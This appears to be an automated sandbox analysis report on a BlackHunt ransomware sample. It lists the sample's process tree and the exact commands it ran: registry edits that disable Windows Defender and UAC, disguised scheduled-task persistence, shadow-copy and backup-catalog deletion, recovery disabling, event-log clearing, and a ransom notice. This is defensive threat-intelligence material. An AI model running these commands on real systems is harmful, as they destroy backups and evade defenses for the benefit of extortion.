cmd.exe 132 PID 2224 wrote to memory of 2792 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 53 PID 2224 wrote to memory of 2792 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 53 PID 2224 wrote to memory of 2792 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 53 PID 2224 wrote to memory of 2792 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 53 PID 2224 wrote to memory of 2600 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 55 PID 2224 wrote to memory of 2600 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 55 PID 2224 wrote to memory of 2600 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 55 PID 2224 wrote to memory of 2600 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 55 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe"C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2516
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe" /F2⤵PID:2436
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe" /F3⤵
- Creates scheduled task(s)
PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1896
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2204
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2032
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:588
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:700
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:488
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1048
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1412
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1248
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2080
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3020
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2196
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4028
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3056
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2696
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4092
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2668
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3108
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:832
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3132
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:780
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3196
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2672
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3608
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1900
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:860
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1920
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1836
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe"2⤵
- Deletes itself
PID:3700 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2424
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11185950861220711109-214196720817068618741496858278-18425697674226936971653669376"1⤵
- Modifies registry class
PID:2580
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1500
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2336
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD541686d57b83a8690d466fc8929b1c121
SHA126db9574c9d7104e1bdaf9a92d9fa5ace795c457
SHA256d8cacae5e0aa5af59099653e1c091b6f02036c20c339fe31a05187f55d179f5f
SHA512060a7589cf08e7a387a5433109ad5c8019f3127bad72c14cd55916a67cef720fbbef7f813159d665e59dc8bfc32a07853b71429c50a6c52e5d31eaa1acecd102
-
Filesize
12KB
MD58d45b4d6f569d55f9074678b8aaade4c
SHA13cd963831f748229bcd33b351b3ff4bc7b99982e
SHA256fd23afba1cffd3aca8d75e22239a1b9a2f3c675e792263df5f181a44b4a872a8
SHA5129a84af8c21b818f060b67690dfccd2d90cbb922be85c9fe1f5a46b421354593dc6dbc5a3d3696a458d34d2aa2e753ac219ca7f1d20875b955ebf19ac382dfc4e
-
Filesize
684B
MD55d5cda5c68ff3d88ca5963be334a3ebd
SHA1dbfdbe617315ed5bb50b0dbf7e39a76902ea80d1
SHA2562bfc541050a12205521857c0438d95a1dee28e419047249d51043a1a166f438a
